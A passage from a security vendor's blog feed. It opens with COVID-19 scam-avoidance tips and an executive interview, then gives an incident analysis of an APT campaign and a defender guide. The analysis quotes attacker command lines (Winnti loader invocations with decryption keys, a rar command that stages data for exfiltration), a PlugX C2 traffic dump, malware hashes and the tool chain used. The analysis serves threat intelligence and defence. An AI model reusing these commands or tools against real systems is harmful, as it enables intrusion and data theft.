As with other IRS scams, the best way to avoid them is to know how the IRS typically communicates. The IRS will never ask for private personal information over email or over the phone. Never share your Social Security Number over email or the phone. The IRS only gets in touch with people through postal mail or in person.

5. Proof of Vaccination Phishing Scheme

A new COVID-19 phishing scam is on the rise: proof of vaccination scam. Cybercriminals are sending phishing emails posing as healthcare institutions asking for urgent confirmation of vaccine status. The emails ask for full names, birth dates, Social Security Numbers, and photos of vaccine cards. This scam is dangerous, not only because it asks for sensitive information, but because the request is a believable one. Employers and various other institutions are on the fence about asking people for their vaccine status, and people are unsure to whom they should divulge this information. 

Like with other phishing scams, pay close attention to the message and how it’s written. Does it convey urgency and penalties for ignoring it? Phishing emails often use language that causes readers to panic and give up their information quickly without taking the time to determine if the message is real or not. Also, does the email or text have typos and is it poorly written? Never click on links or respond to suspicious emails. Instead, contact the supposed sender through the phone number or email address listed on their official website.

6. Video Conferencing Eavesdropping

Video conferencing popularity soared as businesses and schools conducted work and learning online. Cybercriminals capitalized on the surge by forcing their way into video conferencing software and spying on meetings and classrooms. 

The key to protecting the privacy of your teleconference calls is to always have the most up-to-date software installed. Software upgrades often include security patches. One way to ensure you always have the latest, most secure version installed is to enable automatic updates. Also, be careful about what you share over teleconference. Just in case a cybercriminal is eavesdropping, never say aloud or instant message your Social Security Number or other sensitive personal information. Finally, follow your workplace’s IT team’s cybersecurity policies and use only your company-issued device for work purposes. Company-issued devices often have additional security protections to keep your personal and company information safe from prying eyes.

7. Job Scams

Unfortunately, many people lost their jobs during the pandemic. Cybercriminals, aware that people without jobs were likely to jump on an employment opportunity due to economic uncertainty, flooded job boards with fake employment ads and sent fraudulent job offer emails. These job scams turned out to be phishing attempts to extract personal and banking details. In some cases, the scammers asked job seekers to wire money for pre-employment training. 

If you receive a job offer, make sure that it is for a company you actually applied to. Even though companies are looking to hire people quickly, a reputable institution likely won’t offer a job without interviewing candidates first. Most interviews are happening online, so request a video conference to make sure that the person on the other end of the line is real and has honest intentions. Research the interviewer on professional networking sites to make sure they are who they say they are. 

8. Real Estate Scams

Similar to job scams, the urgency of the real estate market during the pandemic may make people act more impulsively than they would under normal circumstances. The rental and housing markets have been extremely competitive, which is causing people to put deposits down for residences that weren’t even real. Since home tours were moved online due to social distancing requirements, buyers and renters were OK with making a decision based on pictures. 

Real estate scams play up the urgency of acting quickly. In their hurry to claim a real estate gem, homebuyers and renters may overlook the most glaring red flag of real estate scams during the pandemic: not viewing the property in person. Additionally, never share your banking information or wire money to someone you have never met in person or cannot verify the accredited real estate agency for which they work.     

9. FakeHealth Alerts 

When a cybercriminal poses as a legitimate organization, it’s more difficult to determine what information to trust. For example, criminals circulated a scam impersonating the CDC that downloaded malware onto users’ devices. 

A great tip to thwart cybercriminals hiding behind the name of a credible organization is to always hover your cursor over links in emails and texts. If a link redirects to a URL that looks suspicious, immediately delete the message. A suspicious URL could contain a typo, a variant spelling of the organization its impersonating, or be a string of jumbled letters and numbers. Emails that claim to be from official organizations will often have the organization’s logo somewhere on the message. Check the clarity of the logo and compare it to the organization’s official site. If the logo is blurry or the coloring seems off, that’s a sign that the message is fake. 

10. Fake Delivery Notices

COVID-19 led to a boom in e-commerce. Shopping that was normally conducted in person moved online, and a pile of packages on the front stoop was a common occurrence. There was a fake delivery notice scam where cybercriminals posed as UPS and Amazon to phish for personal details in order to release a hold on deliveries. 

One final phishing avoidance tip is: Consider what the message is asking. Has UPS ever asked for your Social Security Number before? If they had it, what would they use it for? And there’s no reason for Amazon to have your banking information. Don’t let the urgency of the scammer’s message stress you out. A quick phone call with the delivery service in question should solve the problem. 

The post Top 10 COVID-19 Scams: How to Stay Protected appeared first on McAfee Blogs.

Executive Spotlight: Q&A with SVP of Global Channels, Kathleen Curry Wed, 15 Sep 2021 15:05:22 +0000

For this week’s executive spotlight, I’m highlighting Kathleen Curry, senior vice president, Global Enterprise Channels at McAfee Enterprise. Curry was...

The post Executive Spotlight: Q&A with SVP of Global Channels, Kathleen Curry appeared first on McAfee Blogs.


For this week’s executive spotlight, I’m highlighting Kathleen Curry, senior vice president, Global Enterprise Channels at McAfee Enterprise. Curry was named one of CRN’s 2021 Channel Chiefs. Joining the company in April 2020, she was acknowledged for her contributions expanding our partner program initiatives to reward partners for servicing customers in line with their modern needs and consumption preferences. This includes spearheading McAfee Enterprises’ “channel first” initiative and ethos, aimed to better empower our channel partner community and increase their profitability, while at the same time optimizing the end customer experience by scaling through McAfee Enterprise’s channels and partners. Read below for more.

Q: Who has been the most influential person in your life?

My father instilled in me, from as far back as I can remember, that I can do whatever I set my mind to and that I am the owner of my life story. This helped create a positive, empowered mindset when facing challenges and opportunities throughout my life. And my father always kept our world big. Whether it was traveling to see other cultures, sharing his never-ending love of history, or getting involved in our community, his actions showed me the importance of taking time to connect with others, understand the context of things, and have compassion. While he is no longer with us, I still feel like I get advice from him every day.

Q: What are the most significant problems influencing cybersecurity professionals today?

The ever-changing threat landscape is a real challenge. Finding the time to keep up on trends, proactively secure an environment, and address unexpected issues has become increasingly difficult. Together with our partners, we can help solve these problems.

Q: How do you separate hype from genuine innovation?

Execution. True innovation delivers real outcomes. It can be big or small, but mostly, it must be realized and validated.

Q: With cybersecurity and AI capabilities expanding at a rapid pace, what will the future look like for companies like McAfee Enterprise and our partners in the coming years?

There is tremendous opportunity ahead for us and our partners. With the complexity of the cybersecurity landscape, continuing threats, and talent gaps, our customers need our collective solutions, expertise, and services more than ever. We are charging ahead to optimize our channel program with partner profitability and growth at the forefront. Our dedication to a Channel First strategy coupled with best-in-class solutions positions us extremely well to win and best benefit the customers we serve together.

The post Executive Spotlight: Q&A with SVP of Global Channels, Kathleen Curry appeared first on McAfee Blogs.

Operation ‘Harvest’: A Deep Dive into a Long-term Campaign Wed, 15 Sep 2021 04:01:21 +0000

A special thanks to our Professional Services’ IR team, ShadowServer, for historical context on C2 domains, and Thomas Roccia/Leandro Velasco...

The post Operation ‘Harvest’: A Deep Dive into a Long-term Campaign appeared first on McAfee Blogs.


A special thanks to our Professional Services’ IR team, ShadowServer, for historical context on C2 domains, and Thomas Roccia/Leandro Velasco for malware analysis support.

Executive Summary

Following a recent Incident Response, McAfee Enterprise‘s Advanced Threat Research (ATR) team worked with its Professional Services IR team to support a case that initially started as a malware incident but ultimately turned out to be a long-term cyber-attack.

From a cyber-intelligence perspective, one of the biggest challenges is having information on the tactics, techniques, and procedures (TTPs) an adversary is using and then keeping them up to date. Within ATR we typically monitor many adversaries for years and collect and store data, ranging from indicators of compromise (IOCs) to the TTPs.

In this report, ATR provides a deep insight into this long-term campaign where we will map out our findings against the Enterprise MITRE ATT&CK model. There will be parts that are censored since we respect the confidentiality of the victim. We will also zoom in and look at how the translation to the MITRE Techniques, historical context, and evidence artifacts like PlugX and Winnti malware led to a link with another campaign, which we highly trust to be executed by the same adversary.

IOCs that could be shared are at the end of this document.

McAfee customers are protected from the malware/tools described in this blog. MVISION Insights customers will have the full details, IOCs and TTPs shared via their dashboard. MVISION Endpoint, EDR and UCE platforms provide signature and behavior-based prevention and detection capability for many of the techniques used  in this attack. A more detailed blog with specific recommendations on using the McAfee portfolio and integrated partner solutions to defend against this attack can be found here.

Technical Analysis

Initial Infection Vectors [TA0001]

Forensic investigations identified that the actor established initial access by compromising the victim’s web server [T1190]. On the webserver, software was installed to maintain the presence and storage of tools [T1105] that would be used to gather information about the victim’s network [T1083] and lateral movement/execution of files [T1570] [T1569.002]. Examples of the tools discovered are PSexec, Procdump, and Mimikatz.

Privilege Escalation and Persistence [TA0004TA0003]

The adversary has been observed using multiple privilege escalation and persistence techniques during the period of investigation and presence in the network. We will highlight a few in each category.

Besides the use of Mimikatz to dump credentials, the adversaries used two tools for privilege escalations [T1068]. One of the tools was “RottenPotato”. This is an open-source tool that is used to get a handle to a privileged token, for example, “NT AUTHORITY\SYSTEM”, to be able to execute tasks with System rights.

Example of RottenPotato on elevating these rights:

Figure 1 RottenPotato

The second tool discovered, “BadPotato”, is another open-source tool that can be used to elevate user rights towards System rights.

Figure 2 BadPotato

The BadPotato code can be found on GitHub where it is offered as a Visual Studio project. We inspected the adversary’s compiled version using DotPeek and hunted for artifacts in the code. Inspecting the File (COFF) header, we observed the file’s compilation timestamp:

TimeDateStamp: 05/12/2020 08:23:47  – Date and time the image was created


Another major and characteristic privilege escalation technique the adversary used in this long-term campaign was the malware PlugX as a backdoor. PlugX makes use of the technique “DLL Sideloading” [T1574.002]. PlugX was observed as usual where a single (RAR) executable contained the three parts:

  • Valid executable.
  • Associated DLL with the hook towards the payload.
  • Payload file with the config to communicate with Command & Control Server (C2).

The adversary used either the standalone version or distributed three files on different assets in the network to gain remote control of those assets. The samples discovered and analyzed were communicating towards two domains. Both domains were registered during the time of the campaign.

One of the PlugX samples consisted of the following three parts:

Filename Hashes
HPCustPartic.exe SHA256: 8857232077b4b0f0e4a2c3bb5717fd65079209784f41694f8e1b469e34754cf6
HPCustPartUI.dll SHA256: 0ee5b19ea38bb52d8ba4c7f05fa1ddf95a4f9c2c93b05aa887c5854653248560
HPCustPartic.bin SHA256: 008f7b98c2453507c45dacd4a7a7c1b372b5fafc9945db214c622c8d21d29775

The .exe file is a valid and signed executable and, in this case, an executable from HP (HP Customer participation). We also observed other valid executables being used, ranging from AV vendors to video software. When the executable is run, the DLL next to it is loaded. The DLL is valid but contains a small hook towards the payload which, in our case, is the .bin file. The DLL loads the PlugX config and injects it into a process.

We executed the samples in a test setup and dumped the memory of the machine to conduct memory analysis with volatility. After the basic forensically sound steps, we ran the malfind plugin to detect possible injected code in a process. From the redacted output of the plugin, we observed the following values for the process with possible injected code:

Process: svchost.exe Pid: 860 Address: 0xb50000

Process: explorer.exe Pid: 2752 Address: 0x56a000

Process: svchost.exe Pid: 1176 Address: 0x80000

Process: svchost.exe Pid: 1176 Address: 0x190000

Process: rundll32.exe Pid: 3784 Address: 0xd0000

Process: rundll32.exe Pid: 3784 Address: 0x220000

One observation is the mention of the SVCHOST process with a ProcessID value of 1176 that is mentioned twice but with different addresses. This is similar to the RUNDLL32.exe that is mentioned twice with PID 3785 and different addresses. One way to identify what malware may have been used is to dump these processes with the relevant PID using the procdump module, upload them to an online analysis service and wait for the results. Since this is a very sensitive case, we took a different approach. Using the best of both worlds (volatility and Yara) we used a ruleset that consists of malware patterns observed in memory over time. Running this ruleset over the data in the memory dump revealed the following (redacted for the sake of readability) output:

Figure 3 Output Yarascan memory dump

The output of the Yara rule scan (and there was way more output) confirmed the presence of PlugX module code in PID 1176 of the SVCHOST service. Also, the rule was triggered on PID 3784, which belonged to RUNDLL32.exe.

Investigating the dumps after dynamic analysis, we observed two domain names used for C2 traffic:


In particular, we saw the following hardcoded value that might be another payload being downloaded:

The PlugX families we observed used DNS [T1071.001] [T1071.004] as the transport channel for C2 traffic, in particular TXT queries. Investigating the traffic from our samples, we observed the check-in-signature (“20 2A 2F 2A 0D”) that is typical for PlugX network traffic:

00000000:            47 45 54 20 2F 42 34 42 42 44 43 43 30 32 39 45

00000010:            31 31 39 37 31 39 46 30 36 35 36 32 32 20 48 54

00000020:            54 50 2F 31 2E 31 0D 0A 41 63 63 65 70 74 3A 20

00000030:            2A 2F 2A 0D 0A 43 6F 6F 6B 69 65 3A 20 44 36 43

00000040:            57 50 2B 56 5A 47 6D 59 6B 6D 64 6D 64 64 58 55

00000050:            71 58 4D 31 71 31 6A 41 3D 0D 0A 55 73 65 72 2D

During our analysis of the different PlugX samples discovered, the domain names as mentioned above stayed the same, though the payload values were different. For example:

  • hxxp://
  • hxxp://
  • hxxp://

Other PlugX samples we observed injected themselves into Windows Media Player and started a connection with the following two domains:


Hello Winnti

Another mechanism observed was to start a program as a service [T1543.003] on the Operating System with the acquired System rights by using the *Potato tools. The file the adversary was using seemed to be a backdoor that was using the DLL file format (2458562ca2f6fabddae8385cb817c172).

The DLL is used to create a malicious service and its name is service.dll”. The name of the created service, “SysmainUpdate”, is usurping the name of the legitimate service “SysMain” which is related to the legitimate DLL sysmain.dll and also to the Superfetch service. The dll is run using the command “rundll32.exe SuperFrtch.dll, #1”. The export function has the name “WwanSvcMain”.

The model uses the persistence technique utilizing svchost.exe with service.dll to install a rogue service. It appears that the dll employs several mechanisms to fingerprint the targeted system and avoid analysis in the sandbox, making analysis more difficult. The DLL embeds several obfuscated strings decoded when running. Once the fingerprinting has been done, the malware will install the malicious service using the API RegisterServiceHandlerA then SetServiceStatus, and finally CreateEventA. A description of the technique can be found here.

The malware also decrypts and injects the payload in memory. The following screenshot shows the decryption routine.

Figure 4 Decryption routine

When we analyzed this unique routine, we discovered similarities and the mention of it in a publication that can be read here. The malware described in the article is attributed to the Winnti malware family. The operating method and the code used in the DLL described in the article are very similar to our analysis and observations.

The process dump also revealed further indicators. Firstly, it revealed artifacts related to the DLL analyzed, “C:\ProgramData\Microsoft\Windows\SuperfRtch\SuperfRtch.dat”. We believe that this dat file might be the loaded payload.

Secondly, while investigating the process dump, we observed activities from the backdoor that are part of the data exfiltration attempts which we will describe in more detail in this analysis report.

A redacted snippet of the code would look like this:

Creating archive ***.rar

Adding   [data from location]



Another indicator of discovering Winnti malware was the following execution path we discovered in the command line dump of the memory:

cmd /c klcsngtgui.exe 1560413F7E <abbreviation-victim>.dat

What we observed here was the use of a valid executable, the AES 256 decryption key of the payload (.dat file). In this case, the payload file was named using an abbreviation of the victim company’s name. Unfortunately, the adversary had removed the payload file from the system. File carving did not work since the disk/unallocated space was overwritten. However, reconstructing traces from memory revealed that we were dealing with the Winnti 4.0 malware. The malware was injected into a SVCHOST process where a driver location pointed to the config file. We observed in the process dump the exfiltration of data on the system, such as OS, Processor (architecture), Domain, Username, etc.

Another clue that helped us was the use of DNS tunneling by Winnti which we discovered traces of in memory. The hardcoded resolves to a legitimate OpenDNS DNS server. The IP is pushed into the list generated by the malware at runtime. At the start of the malware, it populates the list with the system’s DNS, and the OpenDNS server is only used as a backup to ensure that the C2 domain is resolved.

Another indicator in the process dump was the setup of the C2 connection including the User-Agent that has been observed being used by Winnti 4.0 malware:

Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36

Other Persistence Activities

WMI activity [T1546.003] was also observed to execute commands on the systems.

From a persistence point of view, scheduled tasks [T1053.005] and the use of valid accounts [T1078] acquired through the use of Mimikatz, or creating LSASS dumps, were observed being employed during the length of the campaign.

Lateral Movement

From a lateral movement perspective, the adversary used the obtained credentials to hop from asset to asset. In one particular case, we observed a familiar filename: “PsExec.exe”. This SysInternals tool is often observed being used in lateral movement by adversaries, however, it can also be used by the sysadmins of the network. In our case, the PsExec executable had a file size of 9.6 MB where the original PsExec (depending on 32- or 64-bit version) had a maximum file size of 1.3 MB. An initial static inspection of the file resulted in a blob of code that was present in the executable which had a very high entropy score (7.99). When running the file from the command line, the following output was observed:

Figure 5 PsExec output

The error notification and the ‘Impacket’ keyword tipped us off and, after digging around, we found more. The fake PsExec is an open-source Python script that is a PsExec alternative with shell/backdoor capability. It uses a script from this location: hxxps:// The file is large since it incorporates a low-level protocol interaction from Impacket. The Python library combined with the script code is compiled with py2exe. The file was compiled during the time of the latest attack activities and signed with an expired certificate.

Data Exfiltration

From what we observed, the adversary had a long-term intention to stay present in the victim’s network. With high confidence, we believe that the adversary was interested in stealing proprietary intelligence that could be used for military or intellectual property/manufacturing purposes.

The adversary used several techniques to exfiltrate the data. In some cases, batch (.bat) scripts were created to gather information from certain network shares/folders and use the ‘rar’ tool to compress them to a certain size [T1020] [T1030]. Example of content in a batch script:

C:\Windows\web\rar.exe a -[redacted] -r -v50000 [Target-directory]

On other occasions, manual variants of the above command were discovered after using the custom backdoor as described earlier.

When the data was gathered on a local system using the backdoor, the files were exfiltrated over the backdoor and the rar files were deleted [T1070.004]. Where external facing assets were used, like a web server, the data was stored in a location in the Internet Information Services (IIS) web server and exfiltrated over HTTP using GET requests towards the exact file paths [T1041] [T1567] [T1071].

An example of the [redacted] web traffic in the IIS logfiles:

Date /Time Request TCP Src port Source IP User-Agent
Redacted GET /****/[redacted].rar 80 180.50.*.* MINIXL
redacted GET /****/[redacted].rar 80 209.58.*.* MINIXL

The source IP addresses discovered belonged to two different ISP/VPN providers based in Hong-Kong.

The User-Agent value is an interesting one, “MINIXL”. When we researched that value, we discovered a blog from Dell SecureWorks from 2015 that mentions the same User-Agent, but also a lot of the artifacts mentioned from the blog overlapped with the observations and TTPs of Operation Harvest [link].

What we could retrieve from open-source databases is that the use of this particular User-Agent is very limited and seems to originate from the APAC region.

Who did it?

That seems to be the one-million-dollar question to be asked. Within McAfee, attribution is not our main focus, protecting our customers is our priority. What we do care about is that if we learn about these techniques during an investigation, can we map them out and support our IR team on the ground, or a customer’s IR team, with the knowledge that can help determine which phase of the attack the evidence is pointing to and based on historical data and intelligence, assist in blocking the next phase and discover more evidence?

We started by mapping out all MITRE ATT&CK Enterprise techniques and sub-techniques, added the tools used, and did a comparison against historical technique data from the industry. We ended up with four groups that shared techniques and sub-techniques. The Winnti group was added by us since we discovered the unique encryption function in the custom backdoor and indicators of the use of the Winnti malware.

Figure 6 ATT&CK technique comparison

The diagram reflecting our outcome insinuated that APT27 and APT41 are the most likely candidates that overlap with the (sub-)techniques we observed.

Since all these groups are in a certain time zone, we extracted all timestamps from the forensic investigation with regards to:

  • Registration of domain
  • Compile timestamps of malware (considering deception)
  • Timestamps of command-line activity
  • Timestamps of data exfiltration
  • Timestamps of malware interaction such as creation, deletion, etc.

When we converted all these timestamps from UTC to the aforementioned groups’ time zones, we ended up with the below scheme on activity:

Figure 7 Adversary’s time of operation

In this campaign, we observed how the adversary mostly seems to work from Monday to Thursday and typically during office hours, albeit with the occasional exception.

Correlating ATT&CK (sub-)techniques, timestamps, and tools like PlugX and Mimikatz are not the only evidence indicators that can help to identify a possible adversary. Command-line syntax, specific code similarity, actor capability over time versus other groups, and unique identifiers are at the top of the ‘pyramid of pain’ in threat intelligence. The bottom part of the pyramid is about hashes, URLs, and domains, areas that are very volatile and easy to change by an adversary.

Figure 8 Pyramid of Pain

Beyond investigating those artifacts, we also took possible geopolitical interests and potential deception into consideration when building our hypothesis. When we mapped out all of these, we believed that one of the two previously mentioned groups were responsible for the campaign we investigated.

Our focus was not about attribution though, but more around where the flow of the attack is, matches against previous attack flows from groups, and what techniques/tools they are using to block next steps, or where to locate them. The more details we can gather at the top of ‘the pyramid of pain’, the better we can determine the likely adversary and its TTP’s.

That’s all Folks!

Well, not really. While correlating the observed (sub-)techniques, the malware families and code, we discovered another targeted attack against a similar target in the same nation with the major motivation of gathering intelligence. In the following diagram we conducted a high-level comparison of the tools being used by the adversary:

Figure 9 Tools comparison

Although some of the tools are unique to each campaign, if taken into consideration over time with when they were used, it makes sense. It demonstrates the development of the actor and use of newer tools to conduct lateral movement and to obtain the required level of user rights on systems.

Overall, we observed the same modus operandi. Once an initial foothold was established, the adversary would deploy PlugX initially to create a few backdoors in the victim’s network in case they were discovered early on. After that, using Mimikatz and dumping lsass, they were looking to get valid accounts. Once valid accounts were acquired, several tools including some of their own tools were used to gain information about the victim’s network. From there, several shares/servers were accessed, and information gathered. That information was exfiltrated as rar files and placed on an internet-facing server to hide in the ‘normal’ traffic. We represent that in the following graphic:

Figure 10 Attack flow

In the 2019/2020 case we also observed the use of a malware sample that we would classify as part of the Winnti malware family. We discovered a couple of files that were executed by the following command:

Start Ins64.exe E370AA8DA0 Jumper64.dat

The Winnti loader ‘Ins64.exe’ uses the value ‘E370AA8DA0’ to decrypt the payload from the .dat file using the AES-256-CTR decryption algorithm and starts to execute.

After executing this command and analyzing the memory, we observed a process injection in one of the svchost processes whereby one particular file was loaded from the following path:


Figure 11 Memory capture

The malware started to open up both UDP and TCP ports to connect with a C2 server.

UDP Port 20502

TCP Port  20501

Figure 12 Network connections to C2

Capturing the traffic from the malware we observed the following as an example:

Figure 13 Winnti HTTP traffic to C2

The packet data was customized and sent through a POST request with several headers towards the C2. In the above screenshot the numbers after “POST /” were randomly generated.

The User-Agent is a good network indicator to identify the Winnti malware since it is used in multiple variants:

Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36

Indeed, the same User Agent value was discovered in the Winnti sample in Operation Harvest and seems to be typical for this malware family.

The cookie value consists of four Dword hex values that contain information about the customized packet size using a XOR value.

We learned more about the packet structure of Winnti from this link.

Applying what we learned about the handshake, we observed the following in our traffic sample:

Dword value 0 = 52 54 00 36

Dword value 1 = 3e ff 06 b2

Dword value 2 = 99 6d 78 fe

Dword value 3 = 08 00 45 00

Dword value 4 = 00 34 00 47

Initial handshake order:

Based on our cross-correlation with samples and other OSINT resources, we believe with a high confidence that this was a Winnti 4.0 sample that connects with a confirmed Winnti C2 server.

The identified C2 server was TCP/80.

Timeline of Events

When analyzing the timestamps from this investigation, like we did for operation Harvest, we came to the below overview:

Figure 14 Beijing working hours case 2019/2020

Again, we observed that the adversary was operating Monday to Friday during office hours in the Beijing time-zone.


Operation Harvest has been a long-term operation whereby an adversary maintained access for multiple years to exfiltrate data. The exfiltrated data would have either been part of an intellectual property theft for economic purposes and/or would have provided insights that would be beneficial in case of military interventions. The adversaries made use of techniques very often observed in this kind of attack but also used distinctive new backdoors or variants of existing malware families. Combining all forensic artifacts and cross-correlation with historical and geopolitical data, we have high confidence that this operation was executed by an experienced APT actor.

After mapping out all data, TTP’s etc., we discovered a very strong overlap with a campaign observed in 2019/2020. A lot of the (in-depth) technical indicators and techniques match. Also putting it into perspective, and over time, it demonstrates the adversary is adapting skills and evolving the tools and techniques being used.

On a separate note, we observed the use of the Winnti malware. We deliberately mention the term ‘malware’ instead of group. The Winnti malware is known to be used by several actors. Within every nation-state cyber-offensive activity, there will be a department/unit responsible for the creation of the tools/malware, etc. We strongly believe that is exactly what we observe here as well. PlugX, Winnti and some other custom tools all point to a group that had access to the same tools. Whether we put name ‘X’ or ‘Y’ on the adversary, we strongly believe that we are dealing with a Chinese actor whose long-term objectives are persistence in their victims’ networks and the acquisition of the intelligence needed to make political/strategic or manufacturing decisions.


MITRE ATT&CK Techniques

Technique ID Technique Title Context Campaign
T1190 Exploit Public-facing application Adversary exploited a web-facing server with application
T1105 Ingress Tool transfer Tools were transferred to a compromised web-facing server
T1083 File & Directory Discovery Adversary browsed several locations to search for the data they were after.
T1570 Lateral Tool Transfer Adversary transferred tools/backdoors to maintain persistence
T1569.002 System Services: Service Execution Adversary installed custom backdoor as a service
T1068 The exploitation of Privilege Escalation Adversary used Rotten/Bad Potato to elevate user rights by abusing API calls in the Operating System.
T1574.002 Hijack Execution Flow: DLL Side-Loading Adversary used PlugX malware that is famous for DLL-Side-Loading using a valid executable, a DLL with the hook towards a payload file.
T1543.003 Create or Modify System Process: Windows Service Adversary launched backdoor and some tools as a Windows Service including adding of registry keys
T1546.003 Event-Triggered Execution: WMI Event Subscription WMI was used for running commands on remote systems
T1053.005 Scheduled task Adversary ran scheduled tasks for persistence of certain malware samples
T1078 Valid accounts Using Mimikatz and dumping of lsass, the adversary gained credentials in the network
T1020 Automated exfiltration The PlugX malware exfiltrated data towards a C2 and received commands to gather more information about the victim’s compromised host.
T1030 Data transfer size limits Adversary limited the size of rar files for exfiltration
T1070.004 Indicator removal on host Where in the beginning of the campaign the adversary was sloppy, during the last months of activity they became more careful and started to remove evidence
T1041 Exfiltration over C2 channel Adversary used several C2 domains to interact with compromised hosts.
T1567 Exfiltration over Web Service Gathered information was stored as ‘rar’ files on the internet-facing server, whereafter they were downloaded by a specific ip range.
T1071.004 Application layer protocol: DNS Using DNS tunneling for the C2 traffic of the PlugX malware


Indicators of Compromise (IOCs)

Note: the indicators shared are to be used in a historical and timeline-based context, ranging from 2016 to March 2021.

Operation Harvest:

PlugX C2:









Operation 2019/2020

PlugX malware:











Winnti C2:



PSW64                  6e983477f72c8575f8f3ff5731b74e20877b3971fa2d47683aff11cfd71b48c6

NTDSDumpEx  6db8336794a351888636cb26ebefb52aeaa4b7f90dbb3e6440c2a28e4f13ef96

NBTSCAN             c9d5dc956841e000bfd8762e2f0b48b66c79b79500e894b4efa7fb9ba17e4e9e

NetSess                ddeeedc8ab9ab3b90c2e36340d4674fda3b458c0afd7514735b2857f26b14c6d

Smbexec              e781ce2d795c5dd6b0a5b849a414f5bd05bb99785f2ebf36edb70399205817ee

Wmiexec              14f0c4ce32821a7d25ea5e016ea26067d6615e3336c3baa854ea37a290a462a8


RAR command-line


The post Operation ‘Harvest’: A Deep Dive into a Long-term Campaign appeared first on McAfee Blogs.

McAfee Enterprise Defender’s Blog: Operation Harvest Wed, 15 Sep 2021 04:01:11 +0000

Summary McAfee Enterprise’s Advanced Threat Research (ATR) team provided deep insight into a long-term campaign Operation Harvest. In the blog,...

The post McAfee Enterprise Defender’s Blog: Operation Harvest appeared first on McAfee Blogs.



McAfee Enterprise’s Advanced Threat Research (ATR) team provided deep insight into a long-term campaign Operation Harvest. In the blog, they detail the MITRE Tactics and Techniques the actors used in the attack. In this blog, our Pre-Sales network defenders describe how you can defend against a campaign like Operation Harvest with McAfee Enterprise’s MVISION Security Platform and security architecture best practices.

Defending Against Operation Harvest with McAfee

Operation Harvest, like other targeted attack campaigns, leverages multiple techniques to access the network and capture credentials before exfiltrating data. Therefore, as a Network Defender you have multiple opportunities to prevent, disrupt, or detect the malicious activity. Early prevention, identification and response to potentially malicious activity is critical for business resilience. Below is an overview of how you can defend against attacks like Operation Harvest with McAfee’s MVISION Security Architecture.

Throughout this blog, we will provide some examples of where MVISION Security Platform could help defend against this type of attack.

Get Prepared with the Latest Threat Intelligence

As Network Defenders our goal is to prevent, detect and contain the threat as early as possible in the attack chain. That starts with using threat intelligence, from blogs or solutions like MVISION Insights to get prepared and using tools like MITRE Attack Navigator to assess your defensive coverage. The ATR blog details the techniques, indicators and tools used by the attackers. Many of the tools used in Operation Harvest are common across other threat actors and detection details for PlugX, and Winnti are already documented in MVISION INSIGHTS.

Get a quick overview of the PlugX tool:

Easily search for or export PlugX IOCs right from MVISION Insights:

Get a quick overview of the Winnti tool:

Easily search for or export Winnti IOCs right from MVISION Insights:

Cross Platform Hunting Rules for Winnti:

MVISION Insights is also updated with the latest technical intelligence on Operation Harvest including a summary of the threat, prevalence, indicators of compromise and recommended defensive countermeasures.

Defending Against Initial Access

In this attack, the initial access involved a compromised web server. Over the last year we have seen attackers increasingly use initial access vectors beyond spear-phishing, such as compromising remote access systems or supply chains. The exploiting of public-facing vulnerabilities for Initial Access is a technique associated with Operation Harvest and other APT groups to gain entry. Detecting this activity and stopping it is critical to limiting the abilities of the threat actor to further their execution strategy. Along with detecting the ongoing activity, it is also imperative to verify critical vulnerabilities are patched and configurations are security best practice to prevent exploitation. MVISION UCE provides visibility into threats, vulnerabilities, and configuration audits mapped to the MITRE ATT&CK Framework for protection against suspicious activity.

Many customer-facing applications and web servers are hosted on cloud infrastructure. As a Network Defender, gaining visibility and monitoring for misconfigurations on the infrastructure platforms is critical as this is increasingly the entry point for an attacker. MVISION Cloud Native Application Protection Platform (CNAPP) provides a continuous assessment capability for multiple cloud platforms in a single console so you can quickly correct misconfigurations and harden the security posture across AWS, AZURE or Google Cloud Platforms.

Harden the Server or Endpoint Against Malicious Tool use

The attackers uploaded several known or potentially malicious tools to compromised systems. Many of these tools were detected on installation or execution by ENS Threat Prevention or Adaptative Threat Prevention Module. The following is a sample of the Threat Event log from ePolicy Orchestrator (ePO) from our testing.

You can easily search for these events in ePO and investigate any systems with detections.

For best protection turn on Global Threat Intelligence (GTI) for both Threat Prevention and Adaptive Threat Protection modules. Ensure ATP Rules 4 (GTI File Reputation) and 5 (URL Reputation) are enabled in ATP. Global Threat Intelligence is updated with the latest indicators for this attack as well.

Additionally, based on other observables in this attack, we believe there are several other Adaptive Threat Prevention Rules that could prevent or identify potentially malicious activity on the endpoint or server. Monitor especially for these ATP events in the ePO threat event logs:

Rule 269: Detects potentially malicious usage of WMI service to achieve persistence

Rule 329: Identify suspicious use of Scheduled Tasks

Rule 336: Detect suspicious payloads targeting network-related services or applications via dual use tools

Rule 500: Block lateral movement using utilities such as Psexec from an infected client to other machines in the network

Rule 511: Detect attempts to dump sensitive information related to credentials via lsaas

Analysis will continue and additional ATP rules we think relate will be added to mitigation guidance in MVISION Insights.

ENS with Expert Rules

Expert Rules are a powerful, customizable signature language within ENS Threat Prevention Module. For this attack, you could use Expert Rules to identify potential misuse of Psexec or prevent execution or creation of certain file types used such as .rar files.

Additional guidance on creating your own Expert Rules and link to our repository are here:

How to Use Expert Rules in ENS to Prevent Malicious Exploits

ATR Expert Rule Repository

Per standard practice, we recommend that customers test this rule in report mode before applying in block mode.

Preventing or Detecting Command and Control

Like other attacks exploiting critical vulnerabilities, attackers may gain command and control over exploited systems to deliver payloads or other actions. MVISION EDR can both identify many command-and-control techniques such as Cobalt Strike beacons. In this case, MVISION EDR would have logged the DNS and HTTP connection requests to the suspicious domains and an SOC analysts could use Real Time and Historical search to hunt proactively for compromised machines.

Additionally, Unified Cloud Edge (UCE – SWG) can prevent access to risky web sites using threat intelligence, URL reputation, behaviour analysis and remote browser isolation. Ensure you have a strong web security policy in place and are monitoring logs. This is a great control to identify potentially malicious C2 activity.

Monitoring for Privilege Escalation

The adversary used several techniques and tools to elevate privileges and run Mimikatz to steal credentials. In our simulation, MVISION EDR proactively identified the attempt to download and execute in memory a Mimikatz PowerShell script.

We simulated the attacker malicious attempt using potato tools reproducing a generic privilege escalation. From the EDR monitoring process tree we could observe the sequence of events with a change in terms of user name from a user account to SYSTEM.”

We started a guided investigation on the affected system. Analytics on the data identified anomalies in user behavior. Guided investigations make easier to visualize complex data sets and interconnections between artifacts and systems.

Identifying Commonly used Tools for Lateral Movement

